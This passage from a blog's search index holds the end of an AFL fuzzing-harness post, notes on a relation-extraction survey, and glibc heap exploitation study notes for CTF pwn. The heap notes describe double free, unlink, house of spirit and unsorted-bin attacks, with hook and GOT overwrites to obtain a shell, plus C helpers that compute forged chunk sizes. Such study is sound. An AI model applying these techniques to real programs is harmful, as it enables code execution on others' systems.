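        count++;
    }
    return count;
}

/* Pick the input source the way afl-fuzz drives a harness: a file path when
 * given (afl substitutes @@ with the current test case), stdin otherwise.
 * Returns the input length or -1. */
ssize_t load_input(int argc, char **argv, unsigned char *buf, size_t cap)
{
    int fd = STDIN_FILENO;
    if (argc >= 2) {
        fd = open(argv[1], O_RDONLY);
        if (fd < 0) return -1;
    }
    ssize_t n = read_all(fd, buf, cap);
    if (fd != STDIN_FILENO) close(fd);
    return n;
}

/* Self-check with constructed input: two well-formed records pushed through a
 * pipe so read_all() is exercised too, plus one truncated record that must be
 * rejected. Returns 1 on success. */
int demo_checks(void)
{
    static const unsigned char good[] = { 0x01, 0x02, 'h', 'i', 0x02, 0x00 };
    static const unsigned char bad[]  = { 0x01, 0x05, 'h', 'i' };
    int fds[2];
    unsigned char buf[MAX_INPUT];
    if (pipe(fds) < 0) return 0;
    if (write(fds[1], good, sizeof good) != (ssize_t)sizeof good) return 0;
    close(fds[1]);
    ssize_t n = read_all(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n == (ssize_t)sizeof good
        && parse_records(buf, (size_t)n) == 2
        && parse_records(bad, sizeof bad) == -1;
}

int main(int argc, char **argv)
{
    unsigned char buf[MAX_INPUT];
    ssize_t n = load_input(argc, argv, buf, sizeof buf);
    if (n < 0) {
        perror("input");
        return 1;                                   /* error, not a crash */
    }
    int records = parse_records(buf, (size_t)n);
    if (records < 0) {
        fprintf(stderr, "malformed input\n");
        return 2;                                   /* rejected input: also not a crash */
    }
    printf("%d records\n", records);
    return 0;
}
```

Build it with afl-clang-fast like the harness above and run either `afl-fuzz -i in -o out ./harness` for stdin or `afl-fuzz -i in -o out ./harness @@` for file input; the only difference for the harness is where load_input() gets its bytes.
]]>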
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>对关系抽取综述的简单总结</title>
<link href="/2022/01/19/%E5%AF%B9%E5%85%B3%E7%B3%BB%E6%8A%BD%E5%8F%96%E7%BB%BC%E8%BF%B0%E7%9A%84%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93/"/>
<url>/2022/01/19/%E5%AF%B9%E5%85%B3%E7%B3%BB%E6%8A%BD%E5%8F%96%E7%BB%BC%E8%BF%B0%E7%9A%84%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="分类"><a href="#分类" class="headerlink" title="Categories"></a>Categories</h2><p>Traditional surveys split relation extraction into two classes: supervised and semi-supervised methods</p><p>Supervised methods: need labelled data, which is expensive to obtain</p><p>The models only work on the text domain of the training set and transfer poorly to other text</p><p>Semi-supervised methods: cut the manual effort a lot, but still need initial relation pairs</p><p>Unsupervised methods: perform too poorly to be worth discussing</p><p>Distant supervision: combines the advantages of semi-supervised and unsupervised methods, using triples (usually expressed in the Resource Description Framework standard) and a knowledge base, but produces more noise than traditional methods (missing labels (false negatives) and wrong labels (false positives))</p><p>Distant supervision is discussed along three axes: noise reduction approaches, embeddings-based approaches, and approaches leveraging auxiliary information</p><p>Noise reduction approaches: address the problems of distant supervision, predicting the relation between entities given the relations provided by the knowledge base</p><p>Embeddings-based approaches: use vector representations of entities and relations for relation extraction.</p><p>Approaches leveraging auxiliary information: use side information such as entity types or logical rules to support extraction</p><p>The three are not mutually exclusive and can be combined</p><p><img src="/image-20220118085727754.png"></p><p>Terms not explained last time:</p><ul><li>bag: the set of sentences that mention the same entity pair</li><li>mention-level relation extraction: given a group of sentences containing the same entity pair, decide whether they express the same relation</li></ul><h2 id="关系抽取具体定义"><a href="#关系抽取具体定义" class="headerlink" title="Definition of relation extraction"></a>Definition of relation extraction</h2><p>Only a priori relations and binary relations are considered here</p><p>Relations and entities have no strict definition; usually we define</p><p>Entity: a noun, or anything that can act as a subject, corresponding to an entry in the knowledge base</p><p>Relation: the element of a triple that links its two entities</p><p>Basic method:</p><p><img src="/image-20220101135614048.png"></p><p>Preprocessing: part-of-speech (POS) taggers (mark nouns, prepositions, etc.)</p><p>dependency parsers (represent the syntactic structure as binary relations, e.g. a dependency tree)</p><p>named entity recognizers (NER) (find candidate entities)</p><p>Entity Matching: match the entities found in the previous step against the knowledge base</p><p>Feature Extraction: for disambiguation, using the information gathered in preprocessing</p><p>Labelling: obtain the label of every entity pair from the knowledge base</p><p>The test set is built the same way, minus the last step</p><p>Main problems of basic relation extraction:</p><ol><li>Labels obtained automatically from the knowledge base are noisy: a sentence mentioning an entity pair does not necessarily express the relation, and different sentences mentioning the same pair may express different relations.</li><li>The incompleteness of the knowledge base hurts both training and evaluation.</li></ol><h2 id="noise-reduction消除噪音"><a href="#noise-reduction消除噪音" class="headerlink" title="Noise reduction"></a>Noise reduction</h2><p>What is noise? Much like type I and type II errors in statistics</p><p>The survey details four approaches</p><h3 id="At-least-one-model"><a href="#At-least-one-model" class="headerlink" title="At-least-one model"></a>At-least-one model</h3><p>Since two entities can be in more than one relation, if an entity pair participates in a relation, then at least one of the sentences mentioning the pair expresses that relation</p><p>By contrast, the plain model is called multi-instance single-label</p><p><img src="/image-20220101145149365.png"></p><p>Because the specific relation cannot be determined, the earlier labelling step does not apply; the at-least-one model also has to predict the candidate relations, again in a pipeline</p><p>The model has three variables:</p><ul><li>X: the word vectors with extra information such as the dependency path between the entities</li><li>Y: the relation label of the entity pair</li><li>Z: whether mention i expresses a known relation</li></ul><p>For the algorithm and its parameters see Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions without labeled text. In Proceedings of the European Conference on Machine Learning and Knowledge Discovery in Databases (ECML PKDD'10). Springer, 148–163</p><h3 id="Data-Incompleteness-Handling"><a href="#Data-Incompleteness-Handling" class="headerlink" title="Data Incompleteness Handling"></a>Data Incompleteness Handling</h3><p>An incomplete knowledge base makes the model misclassify: the basic distant-supervision method takes positives by matching the knowledge base and treats everything else as negative, generating negatives from unrelated entity pairs. A pair labelled negative in training therefore does not necessarily mean that no relation exists.</p><p>Different solutions:</p><ol><li>MIML-RE<ul><li>Bonan Min, Ralph Grishman, Li Wan, Chang Wang, and David Gondek. 2013. Distant supervision for relation extraction with an incomplete knowledge base. In Proceedings of the Human Language Technologies Conference of the North American Chapter of the Association of Computational Linguistics. 777–782.</li></ul></li><li>MultiR<ul><li>Alan Ritter, Luke Zettlemoyer, Oren Etzioni, et al. 2013. Modeling missing data in distant supervision for information extraction. Trans. Assoc. Comput. Linguis. 1, 367–378.</li><li>Wei Xu, Raphael Hoffmann, Le Zhao, and Ralph Grishman. 2013. Filling knowledge base gaps for distant supervision of relation extraction. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL'13). 665–670.</li></ul></li><li>matrix completion, a general formulation of the two approaches above<ul><li>Miao Fan, Deli Zhao, Qiang Zhou, Zhiyuan Liu, Thomas Fang Zheng, and Edward Y. Chang. 2014. Distant supervision for relation extraction with matrix completion. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (ACL'14). 839–849.</li><li>Shiqian Ma, Donald Goldfarb, and Lifeng Chen. 2011. Fixed point and Bregman iterative methods for matrix rank minimization. Math. Program. 128 (2011), 321–353.</li></ul></li></ol><h3 id="Topic-Models"><a href="#Topic-Models" class="headerlink" title="Topic Models"></a>Topic Models</h3><p>topic: a cluster of terms (words or patterns) that frequently occur together in documents</p><p>The approach assigns a topic to every term and computes the conditional probability that word w belongs to topic t</p><p>Mention-level methods assign one relation per sentence, whereas this approach finds more general dependencies between textual patterns and relations, which improves performance and lets known patterns generalise to unseen ones, e.g. "A works as a professor at B" and "A works as an anthropologist at B".</p><p>Reference:</p><ul><li>David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet allocation. J. Mach. Learn. Res. 3 (2003), 993–1022.</li></ul><h3 id="Pattern-Correlations"><a href="#Pattern-Correlations" class="headerlink" title="Pattern Correlations"></a>Pattern Correlations</h3><p>This approach filters the training data: it separates patterns that express a relation from those that do not, and builds a list of patterns that do not express the corresponding relation.</p><p>If a sentence contains a pattern from the negative list, the corresponding label is removed. This reduces the number of wrong labels assigned by distant supervision.</p><p>References:</p><ul><li>Shingo Takamatsu, Issei Sato, and Hiroshi Nakagawa. 2012. Reducing wrong labels in distant supervision for relation extraction. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics. 721–729.</li><li>Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction without labeled data. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP. 1003–1011.</li><li>Bonan Min, Xiang Li, Ralph Grishman, and Ang Sun. 2012. New York University 2012 system for KBP slot filling. In Proceedings of the 5th Text Analysis Conference (TAC'12).</li></ul><h2 id="EMBEDDINGS-BASED-METHODS词向量"><a href="#EMBEDDINGS-BASED-METHODS词向量" class="headerlink" title="EMBEDDINGS-BASED METHODS"></a>EMBEDDINGS-BASED METHODS</h2><p>The noise-reduction methods work on textual features, whereas this family maps the textual representations of relations and entity pairs into a vector space. Its value is to connect text processing with mathematics and machine learning; the challenge is how to produce high-quality embeddings with NLP techniques</p><p>An embedding is a mapping from discrete objects to real-valued vectors; the entity mentions are usually obtained with a named entity recognition tool</p><p>Word vectors with the Skip-gram model: Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word representations in vector space. arXiv Preprint arXiv:1301.3781.</p><p>Relation extraction with piecewise convolutional neural networks (PCNNs): Daojian Zeng, Kang Liu, Yubo Chen, and Jun Zhao. 2015. Distant supervision for relation extraction via piecewise convolutional neural networks. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing (EMNLP'15). 1753–1762</p><h2 id="LEVERAGING-AUXILIARY-INFORMATION-FOR-SUPERVISION利用辅助信息"><a href="#LEVERAGING-AUXILIARY-INFORMATION-FOR-SUPERVISION利用辅助信息" class="headerlink" title="LEVERAGING AUXILIARY INFORMATION FOR SUPERVISION"></a>LEVERAGING AUXILIARY INFORMATION FOR SUPERVISION</h2><ol><li>Combining direct supervision with distant supervision</li><li>The influence of entity recognition</li><li>Logical connections between relations (Logical Formulae)</li></ol><h2 id="数据集和模型评估"><a href="#数据集和模型评估" class="headerlink" title="Datasets and evaluation"></a>Datasets and evaluation</h2><p><img src="/image-20220117232049655.png"></p><p>KBP: Knowledge Base Population</p><p>Distant supervision needs large datasets so that every feature occurs often enough</p><h3 id="评价"><a href="#评价" class="headerlink" title="Evaluation"></a>Evaluation</h3><p>Metrics:</p><ul><li>Precision: of the samples predicted positive, how many are truly positive</li><li>Recall: of the truly positive samples, how many were predicted positive</li><li>F-score: combines the two, F1 = 2PR/(P+R)</li></ul><p>The usual way to compare systems is with precision-recall curves</p><p>Because the knowledge base is incomplete, the number of correctly extracted relations is underestimated. Moreover, the true number of relation mentions is unknown; it can be roughly estimated as the number of relations in the knowledge base between the extracted entity pairs.</p><p>Researchers usually run two kinds of evaluation:</p><ul><li><p>held-out evaluations, where part of the knowledge base is hidden during training and the newly extracted relations are compared against the held-out data;</p></li><li><p>manual evaluations, where a small subset of the data is annotated by human evaluators, often through crowdsourcing.</p></li></ul><p>Both have drawbacks. In held-out evaluation the incompleteness of the knowledge base also affects the test set: an extracted relation may be marked incorrect although it is actually correct, so held-out evaluation underestimates the algorithm. Manual evaluation gives more accurate results but only covers a relatively small subset of the data.</p><p>You may have noticed that everything above assumes relation extraction on top of entities already labelled by NER, and says nothing about joint learning. Joint learning will need further reading, but a good start is looking at the code of existing models.</p>]]></content>
<tags>
<tag>NLP</tag>
</tags>
</entry>
<entry>
<title>堆学习整理(一)</title>
<link href="/2021/11/28/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%B8%80%EF%BC%89/"/>
<url>/2021/11/28/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%B8%80%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="malloc"><a href="#malloc" class="headerlink" title="malloc"></a>malloc</h2><p>Chunk sizes are aligned to 2*SIZE_SZ (16 bytes on 64-bit)</p><p>request2size adds SIZE_SZ (8 bytes) for the size field and rounds up to 16, so the chunk size of malloc(n) is n+8 rounded up to a multiple of 16, with a minimum of 0x20. Put differently: if the low nibble of n is greater than 8, n is rounded up to the next 0x10 boundary, otherwise down, and 0x10 is added for the header (malloc(0x18) gives a 0x20 chunk, malloc(0x19) a 0x30 chunk).</p><h2 id="fastbin"><a href="#fastbin" class="headerlink" title="fastbin"></a>fastbin</h2><ol><li>Singly linked</li><li><strong>fd points to the chunk that entered the bin earlier; allocation is LIFO</strong></li><li>Not consolidated on free, even when adjacent to another free region or to the top chunk</li><li>The prev_inuse bit of the following chunk stays set</li><li>Sizes 0x20 to 0x80, 7 bins in total (the default global_max_fast on 64-bit)</li><li>glibc requires a chunk to hold at least the 4 mandatory fields, so malloc(size) with size up to 0x18 still yields a 0x20 chunk</li><li>The commonly used misaligned 0x7f size byte corresponds to the 0x70 fastbin (i.e. malloc(0x60))</li><li>The double-free check only compares against the head of the fastbin</li></ol><h2 id="unsorted-bin"><a href="#unsorted-bin" class="headerlink" title="unsorted bin"></a>unsorted bin</h2><ol><li><p>Doubly linked</p></li><li><p>Takes chunks whose size is not a fastbin size</p></li><li><p>The first chunk to enter has fd and bk pointing at a fixed offset inside main_arena; afterwards <strong>bk points to the chunk that entered later, fd to the one that entered earlier</strong>, forming a circular doubly linked list with main_arena</p></li><li><p>free triggers unlink and consolidates physically adjacent free chunks</p></li><li><p>Usage: the unsorted bin is traversed <strong>FIFO</strong>: <strong>chunks are inserted at the head of the list and taken from the tail</strong>.</p><p>When malloc finds no chunk of the right size in fastbin or smallbin, it tries the unsorted bin. If a chunk taken from it fits exactly it is returned to the user, otherwise the chunks are sorted into their respective bins.</p></li></ol><h2 id="Tcache"><a href="#Tcache" class="headerlink" title="Tcache"></a>Tcache</h2><ol><li><p>On the first malloc, a chunk is allocated first to hold the <code>tcache_perthread_struct</code>.</p></li><li><p>free of a chunk whose size is within the tcache range (chunk sizes up to 0x410 by default, i.e. requests up to 0x408)</p><p>before tcache existed it would go to fastbin or unsorted bin</p><p>with tcache:</p><ul><li>it goes to the matching tcache bin first, until that bin is full (7 entries by default)</li><li>once the bin is full, further frees behave as before and go to fastbin or unsorted bin</li><li>tcache chunks are never consolidated (the inuse bit is not cleared)</li><li><strong>LIFO</strong></li></ul></li><li><p>malloc of a size within the tcache range</p></li><li><p>chunks are taken from tcache first, until it is empty</p></li><li><p>when tcache is empty, the other bins are searched</p></li><li><p>when tcache is empty and <code>fastbin/smallbin/unsorted bin</code> contains chunks of the matching size, those chunks are moved into tcache until it is full and then taken from tcache; the order of the chunks is therefore reversed compared with their order in the bin</p></li></ol><h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><p>The classic case is double free, done in fastbin or tcache</p><p>The flow</p><ol><li>double free</li><li>modify the freed chunk's bin link to obtain an allocation at an arbitrary address</li><li>find the libc base</li><li>two options: overwrite <code>__malloc_hook</code> with a one_gadget and call malloc, which needs the gadget's register constraints to hold but is simple; or overwrite <code>__free_hook</code> with the address of system and free a chunk containing /bin/sh</li></ol><h2 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h2><ol><li>Requirement: the address of the array that stores the chunk pointers must be known</li><li>Heap contents: the contents of chunk[a] are controlled; place fd = &chunk[a]-0x18 and bk = &chunk[a]-0x10 in it, and use a heap overflow to rewrite the prev_size and the prev_inuse bit (the low bit of the size field) of the adjacent chunk, so that the fake chunk looks like a free chunk preceding it.</li><li>The chunksize check can be passed either by making the forged size equal to the prev_size of the adjacent chunk, or, since prev_size is only used to find the start of the previous chunk, by forging another adjacent chunk inside chunk[a] whose prev_size equals the forged chunksize. Limited to glibc <= 2.28.</li><li>Effect: the array slot that held chunk[a] (the chunk preceding the fake chunk) now holds &chunk[a]-0x18</li><li>Use: overwrite GOT entries, e.g. free with system or atoi with system; both then get a shell by calling the overwritten function with /bin/sh as its argument</li></ol><h2 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h2><h3 id="house-of-spirit"><a href="#house-of-spirit" class="headerlink" title="house of spirit"></a>house of spirit</h3><ol><li>The fake chunk's IS_MMAPPED bit must not be set, because free handles mmapped chunks separately.</li><li>The fake chunk's address must be aligned (MALLOC_ALIGN_MASK)</li><li>The fake chunk's size must fall into a fastbin and must itself be aligned.</li><li>The size of the chunk following the fake chunk must not be smaller than <code>2 * SIZE_SZ</code> nor larger than <code>av->system_mem</code>.</li><li>The head of the fastbin the fake chunk belongs to must not be the fake chunk itself, i.e. no double free.</li></ol><p>The relevant fastbin handling in free:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c">if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())<br>    ...<br>    )<br>  {<br>    // the basic checks on size itself were done earlier<br>    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)<br>        || __builtin_expect (chunksize (chunk_at_offset (p, size))<br>                             >= av->system_mem, 0))<br>      {<br>        ...<br>        // the next chunk's size is checked again under the arena lock<br>        if (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ<br>            || chunksize (chunk_at_offset (p, size)) >= av->system_mem)<br>          {<br>            errstr = "free(): invalid next size (fast)";<br>            goto errout;<br>          }<br>        ...<br></code></pre></td></tr></table></figure><p>As long as the size checks on the chunk and on the following chunk pass, the fake chunk goes into the fastbin normally</p><p>A subsequent malloc of the matching size then returns a chunk at the fake chunk's address</p><p>The basic use of fastbin attack is to obtain a chunk at a known address and write through it</p><p>There is also a variant based on global_max_fast, which has to be combined with unsortedbin attack</p><p>The core idea is to use fastbin's singly linked list together with misaligned size bytes to carve a chunk out of a known address and overwrite what is there</p><h2 id="Unsorted-Bin-attack"><a href="#Unsorted-Bin-attack" class="headerlink" title="Unsorted Bin attack"></a>Unsorted Bin attack</h2><p>Set the chunk's bk to &target-0x10; fd can be anything</p><p>Allocating this chunk out of the unsorted bin then writes to the chosen address, although the unsorted bin may be unusable afterwards</p><p>The value written is unsorted_chunks(av), the address of the unsorted bin inside main_arena: a large number that is not known exactly</p><p>One use is to turn a loop bound or condition variable into a huge value; nothing more to say about that</p><p>Another is to modify global_max_fast in libc so that larger chunks are treated as fastbin chunks, which enables fastbin attacks on them.</p><ol><li><p>After <code>global_max_fast</code> has been raised, freeing a larger chunk indexes past the end of the fastbinsY array, because the array has a fixed number of slots and the index grows with the size. If the size of the freed chunk is controlled, the chunk's address can be written to any location after fastbinsY (inside or beyond main_arena).</p><p>To write to a given address: compute, from the distance between the target and the fastbinsY array, the size the freed chunk must have, then free a chunk of that size and its address lands at the target.</p><p>The offset can be computed as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">fastbin_ptr = libc_base + libc.symbols['main_arena'] + 8   # fastbinsY[0] on glibc 2.23; from 2.27 on it sits at main_arena+0x10<br>idx = (target_addr - fastbin_ptr) // 8<br>size = idx * 0x10 + 0x20<br></code></pre></td></tr></table></figure><p>Or use a plain fastbin attack, now free of the global_max_fast limit</p></li></ol>]]></content>
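<![CDATA[
Added example, not code from the original post: small arithmetic helpers and a model of the fastbin checks in free() described in this post, written for x86_64 glibc (SIZE_SZ = 8). It answers three questions that come up when preparing a fastbin or house-of-spirit attack: which chunk size a request produces (request2size), what a fake chunk and its neighbour must look like to be accepted into a fastbin, and which size has to be freed so that its address lands at a chosen slot past fastbinsY once global_max_fast has been raised. The addresses (0x1000, 0x1800), the 0x21000 system_mem and the stack-carved fake chunk are assumptions for the demo; no real arena is touched and the double-free check against the bin head is left out because it needs the live arena.

```c
/* Added example, not code from the original post: small arithmetic helpers
 * and a model of the fastbin checks in free() from this post, written for
 * x86_64 glibc (SIZE_SZ = 8). The addresses, system_mem value and the fake
 * chunk below are hypothetical; no real arena is touched. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SIZE_SZ            ((size_t)8)
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)       /* 0xf */
#define MIN_CHUNK_SIZE     (4 * SIZE_SZ)           /* 0x20: four mandatory fields */
#define DEFAULT_MXFAST     ((size_t)0x80)          /* default global_max_fast on 64-bit */
#define SIZE_BITS          ((size_t)7)
#define IS_MMAPPED         ((size_t)2)

/* glibc request2size: requested bytes -> chunk size including the header. */
size_t request2size(size_t req)
{
    if (req + SIZE_SZ + MALLOC_ALIGN_MASK < MIN_CHUNK_SIZE)
        return MIN_CHUNK_SIZE;
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
}

/* fastbin_index and its inverse on 64-bit: slot = (size >> 4) - 2. */
size_t fastbin_index(size_t size)           { return (size >> 4) - 2; }
size_t fastbin_size_for_index(size_t idx)   { return (idx + 2) << 4; }

/* global_max_fast trick: given the address of fastbinsY[0] and a target word
 * after it, return the chunk size whose free() stores the chunk address there.
 * This is the post's idx = (target - fastbin_ptr) / 8; size = idx*0x10 + 0x20. */
size_t size_for_target(uintptr_t fastbinsY, uintptr_t target)
{
    return fastbin_size_for_index((target - fastbinsY) / SIZE_SZ);
}

struct malloc_chunk { size_t prev_size; size_t size; struct malloc_chunk *fd; struct malloc_chunk *bk; };
static size_t chunksize(const struct malloc_chunk *p) { return p->size & ~SIZE_BITS; }
static struct malloc_chunk *chunk_at_offset(const struct malloc_chunk *p, size_t s)
{ return (struct malloc_chunk *)((char *)p + s); }

/* Model of the checks free(mem) applies before placing a chunk in a fastbin.
 * Returns 0 when the chunk is accepted, otherwise a code naming the check
 * that fails. The double-free check against the bin head is not modelled
 * because it needs the live arena. */
int fastbin_free_checks(void *mem, size_t global_max_fast, size_t system_mem)
{
    struct malloc_chunk *p = (struct malloc_chunk *)((char *)mem - 2 * SIZE_SZ);
    size_t size = chunksize(p);
    if ((uintptr_t)p & MALLOC_ALIGN_MASK) return 1;                     /* free(): invalid pointer */
    if (size < MIN_CHUNK_SIZE || (size & MALLOC_ALIGN_MASK)) return 2;  /* free(): invalid size */
    if (p->size & IS_MMAPPED) return 3;                                 /* munmap path, never a fastbin */
    if (size > global_max_fast) return 4;                               /* not a fastbin size */
    struct malloc_chunk *next = chunk_at_offset(p, size);
    if (next->size <= 2 * SIZE_SZ || chunksize(next) >= system_mem)
        return 5;                                                       /* free(): invalid next size (fast) */
    return 0;
}

/* House of spirit on a forged 0x40 chunk carved out of a stack array: returns
 * the result of the free() checks for a given size of the following chunk. */
int house_of_spirit_demo(size_t next_size)
{
    _Alignas(16) size_t area[16] = {0};
    area[1] = 0x40 | 1;             /* fake size: prev_inuse set, IS_MMAPPED clear */
    area[9] = next_size;            /* size field of the chunk at fake+0x40 */
    return fastbin_free_checks(&area[2], DEFAULT_MXFAST, 0x21000 /* typical initial heap */);
}

int main(void)
{
    printf("malloc(0x18) -> chunk 0x%zx, malloc(0x19) -> chunk 0x%zx\n",
           request2size(0x18), request2size(0x19));
    printf("size to free for the slot 0x800 bytes past fastbinsY: 0x%zx\n",
           size_for_target(0x1000, 0x1800));
    printf("house of spirit accepted with next size 0x50: %d\n", house_of_spirit_demo(0x50));
    printf("rejected with next size 0: %d\n", house_of_spirit_demo(0));
    return 0;
}
```

house_of_spirit_demo(0x50) passes because 0x50 lies strictly between 2*SIZE_SZ and system_mem, while a next size of 0 or of system_mem itself fails the fifth check; this is exactly the pair of bounds the quoted free() excerpt enforces, and the reason the byte after the fake chunk has to be prepared as carefully as the fake size itself.
]]>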
<tags>
<tag>pwn</tag>
</tags>
</entry>
</search>